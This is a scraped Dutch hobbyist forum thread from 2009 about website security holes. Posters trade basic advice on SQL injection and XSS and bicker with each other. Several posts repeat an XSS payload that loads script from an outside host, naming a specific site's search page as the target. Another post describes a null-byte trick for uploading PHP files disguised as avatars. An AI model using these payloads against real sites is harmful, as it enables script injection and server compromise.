• Login
  • Register
  • Zoek
This Thread
  • Everywhere
  • This Thread
  • This Forum
  • Articles
  • Pages
  • Forum
  • Filebase Entry
  • More Options

ICTscripters

Dé plek voor IT

Dé plek voor IT

Login

Geavanceerde opties
  1. Home
  2. Forum
    1. Alle berichten
    2. Recente activiteiten
  3. ICT Nieuws
  4. Blog
  5. Marktplaats
    1. Werk
    2. Advertenties
    3. Domeinnamen
    4. Websites
    5. Design & lay-outs
    6. Scripts
    7. Overige
  6. Design
  7. Leden
    1. Actieve bezoekers
    2. Team
    3. Leden zoeken
  8. Downloads
  9. Goedkope domeinnamen
  1. Home
  2. Forum
    1. Alle berichten
    2. Recente activiteiten
  3. ICT Nieuws
  4. Blog
  5. Marktplaats
    1. Werk
    2. Advertenties
    3. Domeinnamen
    4. Websites
    5. Design & lay-outs
    6. Scripts
    7. Overige
  6. Design
  7. Leden
    1. Actieve bezoekers
    2. Team
    3. Leden zoeken
  8. Downloads
  9. Goedkope domeinnamen
  1. Home
  2. Forum
    1. Alle berichten
    2. Recente activiteiten
  3. ICT Nieuws
  4. Blog
  5. Marktplaats
    1. Werk
    2. Advertenties
    3. Domeinnamen
    4. Websites
    5. Design & lay-outs
    6. Scripts
    7. Overige
  6. Design
  7. Leden
    1. Actieve bezoekers
    2. Team
    3. Leden zoeken
  8. Downloads
  9. Goedkope domeinnamen
  1. Dé plek voor IT - ICTscripters
  2. Forum
  3. Overig
  4. De lounge

Forum

  • Beta-testers gezocht voor Crypto-oefenplatform

    Syntax 29 januari 2026 om 16:11
  • Na 15 jaar terug van weggeweest: iCriminals.nl is terug (BETA)!

    Syntax 19 januari 2026 om 09:34
  • Developer Gezocht

    Mikevdk 10 januari 2026 om 18:57
  • Op zoek naar de legends

    Syntax 5 januari 2026 om 13:50
  • [FREE] WeFact Hosting module

    Jeroen.G 13 oktober 2025 om 14:09
  • Help testers nodig voor android app Urgent

    urgentotservices 26 september 2025 om 10:21
  • Versio vervanger

    Jeroen.G 25 augustus 2025 om 15:56
  • Afspraken systeem met planbeperking

    Lijno 1 augustus 2025 om 23:04

Marktplaats

  • 321 Nieuwe Domeinnamen December 2025

    shiga 1 januari 2026 om 10:26
  • Meerdere mafia game template te koop

    Syntax 26 december 2025 om 00:07
  • Van een pixelige afbeelding naar een strakke, moderne website

    Syntax 21 december 2025 om 17:05

Beveiligingslekken

  • Superior
  • 5 november 2009 om 14:48
  • Closed
  • godborn
    Intermediate
    Berichten
    234
    • 19 november 2009 om 16:51
    • #41
    Citaat van Alex

    Nou Terror,
    ik weet van mezelf dat als ik me verveel dat ik erachter ga zoeken, en soms, als ik de eigenaar van die site ken (waar bv. criminolz opdraait) maar er niets van moet hebben het misschien tegen hem gebruik :p


    - Met welke beveiligings fouten was jij bekend?
    sql injections, xss en bruteforce
    - Hoe voorkom jij dit?
    zoveel mogelijk valideren, soms wel overdreven..
    - Wat is je ondernomen actie?
    functies zoals mysql_real_escape_strig en htmlentities
    - Heb jij je coding aangepast na dit bericht?
    nog niet, ben het wel van plan

    Toon Meer

    Zozo jij hebt veel verstand, 1 week terug op je websiteje scriptingstart vond ik al 4 basis beveiligingslekken in 1 minuut, terwijl je vriendje melvin zo trots over jullie skills zat te praten dat jullie elke site kunnen hacken etc en dat het mij niet zou lukken een lek te vinden op jullie site. maar geluk met je vaardigheden.

    GEEN BAN, DIT IS ENKEL DAT IE NIET MOET OPSCHEPPEN.

  • interneppers
    \\\\&quot
    Berichten
    5
    • 26 november 2009 om 16:04
    • #42

    Een aangezien het hier gaat over Beveiligingslekken, zal ik hier ook gelijk reageren.

    Was het jullie al bekend dat deze website ook lek is? XSS is mogelijk hier en daar (drie dubbele addslashes maakt niets uit 8-|).

    Beheerder kan een mailtje sturen naar info @ naam die ik heb opgegeven en daarachter .nl ;)

    \"><script src=http://hackclub.nl/xss.js></script>

  • rienk
    Beginner
    Berichten
    13
    • 28 november 2009 om 16:21
    • #43

    Soms kun je php files uploaden als avatar ofzo met de naam

    PHP
    avatar.php%00.jpg

    het script denkt dat ie jpg upload, maar je kan het bestand vervolgens openen in php.

    Code
    $extensions = array(jpg, jpeg); // ALLOWED EXTENSIONS 
    echo \'Uploading of \"haxor.php\" was succesfull\';
  • Niels
    -1
    Berichten
    1.360
    • 28 november 2009 om 18:45
    • #44
    Citaat van interneppers

    Een aangezien het hier gaat over Beveiligingslekken, zal ik hier ook gelijk reageren.

    Was het jullie al bekend dat deze website ook lek is? XSS is mogelijk hier en daar (drie dubbele addslashes maakt niets uit 8-|).

    Beheerder kan een mailtje sturen naar info @ naam die ik heb opgegeven en daarachter .nl ;)


    Bijzonder uhm.. triest. Sowieso heeft xss niks weinig te maken met slashes he. Alleen als je gebruik wilt maken van javascript, html tags kunnen opzich welzonder quotes dus.

    -1

  • jet-li
    Student
    Berichten
    56
    • 29 november 2009 om 21:02
    • #45

    Je server beveiligen op nieuwste update's soms zijn er zo 0-day exploits uit.

  • interneppers
    \\\\&quot
    Berichten
    5
    • 3 december 2009 om 11:47
    • #46
    Citaat van Niels


    Bijzonder uhm.. triest. Sowieso heeft xss niks weinig te maken met slashes he. Alleen als je gebruik wilt maken van javascript, html tags kunnen opzich welzonder quotes dus.

    Lol. Je hebt helemaal geen quotes nodig om een script te injecteren.... Zie onderstaande ;)


    \"><script src=http://hackclub.nl/xss.js></script>

  • Niels
    -1
    Berichten
    1.360
    • 4 december 2009 om 08:33
    • #47

    interneppers
    Ik weet niet uit welk hol jij bent gekropen maar kijk dit eens:

    Citaat

    ... html tags kunnen opzich welzonder quotes dus.


    Dit komt dus uit me vorige reactie.

    Maargoed een screenshot doet me ook verdomd weinig eigenlijk, het kan net zo goed realtime geedit zijn aangezien je de web developers add on ook hebt.

    Tevens ben je wel heel triest om te denken dat dit werkt:

    PHP
    "><script src=http://hackclub.nl/xss.js></script>

    -1

  • interneppers
    \\\\&quot
    Berichten
    5
    • 7 december 2009 om 11:32
    • #48

    Niels, ben jij serieus? Wat ben jij triest zeg. Geef mij 1 goede reden om te geloven dat die code niet zou kunnen werken?

    Weet je wat, doe het zelf anders? Bij zoeken voer je bovenstaande code uit. Dan zie je het vanzelf ;)

    URL: http://www.criminalspoint.com/zoeken.html
    ZOEKTERM:

    Citaat

    "><script src=http://hackclub.nl/xss.js></script>

    ENTER DRUKKEN

    Kan het nog duidelijker? Elite-member? Lol. Laat me niet lachen.

    Cheers :cheer:

    PS. Wanneer gaan die graftiefus addslashes eens weg?

    \&amp;quot;&amp;gt;&amp;lt;script src=http://hackclub.nl/xss.js&amp;gt;&amp;lt;/script&amp;gt;

  • Axl_H
    WAN\'T TO LEARN SOMETHING
    Berichten
    1.465
    • 7 december 2009 om 11:41
    • #49
    Citaat van Niels

    interneppers
    Ik weet niet uit welk hol jij bent gekropen maar kijk dit eens:


    Dit komt dus uit me vorige reactie.

    Maargoed een screenshot doet me ook verdomd weinig eigenlijk, het kan net zo goed realtime geedit zijn aangezien je de web developers add on ook hebt.

    Tevens ben je wel heel triest om te denken dat dit werkt:

    PHP
    "><script src=http://hackclub.nl/xss.js></script>

    het werk ook daadwerkelijk, is gewoon een bestandje om te kijken of t is beveiligd:P:P

  • Niels
    -1
    Berichten
    1.360
    • 7 december 2009 om 14:38
    • #50

    Goh dat wist ik nog niet zeg. Weer wat geleerd.
    Denk je nou werkelijk dat ik die basis pruttel waar jullie lekker mee knooien niet ken of vroeger mee gewerkt heb ?

    Bouw dan de Twitter malware javascrpt om ofzo als je toch zo goed bent. (dit is dan weer tegen interneppers met zijn xss beveiliging voor 20 euro wat nooit zou uitkunnen voor iemand met verstand van zake)

    -1

  • Axl_H
    WAN\'T TO LEARN SOMETHING
    Berichten
    1.465
    • 7 december 2009 om 14:47
    • #51
    Citaat van Niels

    Goh dat wist ik nog niet zeg. Weer wat geleerd.
    Denk je nou werkelijk dat ik die basis pruttel waar jullie lekker mee knooien niet ken of vroeger mee gewerkt heb ?

    Bouw dan de Twitter malware javascrpt om ofzo als je toch zo goed bent. (dit is dan weer tegen interneppers met zijn xss beveiliging voor 20 euro wat nooit zou uitkunnen voor iemand met verstand van zake)


    tis denk niet eens een lek, want r staat een bestand op de server die je kan aanroepen, waarschijnlijk heeft koen dat r in gezet, tell me i'm wrong

  • Niels
    -1
    Berichten
    1.360
    • 7 december 2009 om 16:47
    • #52
    Citaat van deathkill


    tis denk niet eens een lek, want r staat een bestand op de server die je kan aanroepen, waarschijnlijk heeft koen dat r in gezet, tell me i'm wrong


    Nee de fout heeft te maken met het feit dat html tekst niet naar plain worden opgezet. Maar inderdaad we kunnen koen de schuld geven

    -1

  • Axl_H
    WAN\'T TO LEARN SOMETHING
    Berichten
    1.465
    • 8 december 2009 om 13:32
    • #53

    zoals altijd:P ben nu bezig met een source, weet iemand hoe je inputs beveiligd(de mogelijkheden)?

  • Niels
    -1
    Berichten
    1.360
    • 8 december 2009 om 17:02
    • #54
    Citaat van deathkill

    zoals altijd:P ben nu bezig met een source, weet iemand hoe je inputs beveiligd(de mogelijkheden)?


    Door form validation misschien? Google eerst eens.

    -1

  • Axl_H
    WAN\'T TO LEARN SOMETHING
    Berichten
    1.465
    • 8 december 2009 om 20:44
    • #55

    had al wel 1 en t ander gezocht, maar mischien dat r onbekende form validation functies zijn

Participate now!

Heb je nog geen account? Registreer je nu en word deel van onze community!

Maak een account aan Login

ICT Nieuws

  • Fijne feestdagen

    tcbhome 28 december 2025 om 13:55
  • Kritieke update voor Really Simple Security-plug-in

    K.Rens 16 november 2024 om 16:12
  • ING Nederland streeft naar ondersteuning van Google Pay tegen eind februari

    K.Rens 2 november 2024 om 16:09

Blogs

  • Functioneel ontwerp

    Dees 28 december 2014 om 12:38
  • Access Control List implementatie in PHP/MySQL - deel 1/2

    FangorN 28 december 2018 om 12:35
  • Access Control List implementatie in PHP/MySQL - deel 2/2

    FangorN 29 december 2018 om 12:37

Gebruikers die dit topic bekijken

  • 1 Gasten
  1. Marktplaats
  2. Design
  3. Voorwaarden
  4. Ons team
  5. Leden
  6. Geschiedenis
  7. Regels
  8. Links
  9. Privacy Policy
ICTscripters ©2005 - 2026 , goedkope hosting door DiMoWeb.com, BE0558.915.582
Sponsors: Beste kattenhotel provincie Antwerpen | Beste Zetes eid kaartlezer webshop
Style: Nexus by cls-design
Stylename
Nexus
Manufacturer
cls-design
Licence
Commercial styles
Help
Supportforum
Visit cls-design